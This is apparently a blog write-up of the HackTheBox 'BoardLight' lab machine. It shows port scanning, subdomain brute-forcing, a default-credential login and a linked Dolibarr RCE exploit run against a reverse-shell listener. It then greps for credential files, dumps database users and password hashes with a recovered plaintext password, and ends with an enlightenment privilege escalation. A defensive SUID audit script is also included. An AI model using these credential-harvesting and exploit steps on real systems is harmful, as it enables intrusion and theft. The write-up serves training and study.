HTB-BoardLight

metafa1ica
ip='10.129.254.182'
ports=$(nmap -p- --min-rate=1000 -T4 "$ip" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p$ports -sC -sV $ip
echo "$ip board.htb" | sudo tee -a /etc/hosts

Ports 22 and 80 are open.

vhost brute-forcing

I looked around and got nowhere; the HTB hint says to brute-force subdomains.

ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://board.htb -H 'Host: FUZZ.board.htb' -fw 6243 -t 100

Found crm.board.htb.

Weak credentials

The weak credentials admin/admin logged straight in.

CVE-2023-30253

Dolibarr <= 17.0.0 has an RCE.

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

python poc.py http://crm.board.htb admin admin 10.10.16.42 9001

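The privileges are fairly low, so privilege escalation has to be considered next.

Privilege escalation

Searching for SUID binaries turns up the following: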

$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
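
From the defender's side, the useful question about a listing like the one above is which entries fall outside a reviewed baseline. The script below is an added example, not part of the original write-up; the BASELINE allowlist and the function names suid_outliers and outlier_dirs are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): triage a setuid-root listing
# against a reviewed baseline. BASELINE is an assumed allowlist for
# illustration; derive a real one from a clean install of the same image.
BASELINE='/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign'

# Excerpt of the find output shown above, used as offline sample input.
SAMPLE='/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/sudo
/usr/bin/passwd'

# Read one path per line on stdin; print each path that is not in BASELINE.
suid_outliers() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    # -x whole line, -F fixed string: dots in paths must not act as regex
    printf '%s\n' "$BASELINE" | grep -qxF "$path" || printf '%s\n' "$path"
  done
}

# Summarise outliers as "<count> <directory>", largest group first, so a
# non-baseline package shipping several setuid helpers stands out.
outlier_dirs() {
  suid_outliers | sed 's|/[^/]*$||' | sort | uniq -c | sort -rn |
    awk '{print $1, $2}'
}

printf '%s\n' "$SAMPLE" | outlier_dirs
# Live audit: find / -xdev -user root -perm -4000 -type f 2>/dev/null | suid_outliers
```

Each outlier is then either added to the baseline after review or has its setuid bit or owning package removed.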

Checking the listening ports shows 3306.

Look for the database username and password.

find / -regex ".*\.php" 2>/dev/null | xargs grep -E "=jdbc:|pass=|passwd=" 2>/dev/null 

The configuration file is at /var/www/html/crm.board.htb/htdocs/conf/conf.php

$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

mysql -u'dolibarrowner' -p'serverfun2$2023!!' -e 'SHOW TABLES FROM dolibarr;'
mysql -u'dolibarrowner' -p'serverfun2$2023!!' -e 'select * FROM dolibarr.llx_user;'

A selection of the data:

| login | pass_crypted | api_key |
| --- | --- | --- |
| dolibarr | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL |
| admin | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | yr6V3pXd9QEI |

I stared at this for a long time to no avail; it turned out the MySQL password is reused for the SSH login. HTB loves this trick.

ssh larissa@$ip

enlightenment

enlightenment showed up in the SUID listing earlier; I asked GPT, and this thing has a privilege-escalation vulnerability.

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

3e992b38b4d504af1d4243a401568db7

  • Title: HTB-BoardLight
  • Author: metafa1ica
  • Created: 2025-08-04 22:40:45
  • Updated: 2025-08-17 14:28:18
  • Link: https://metafa1ica.github.io/post/606d94a37d5d/
  • Copyright: This article is licensed under CC BY-NC-SA 4.0.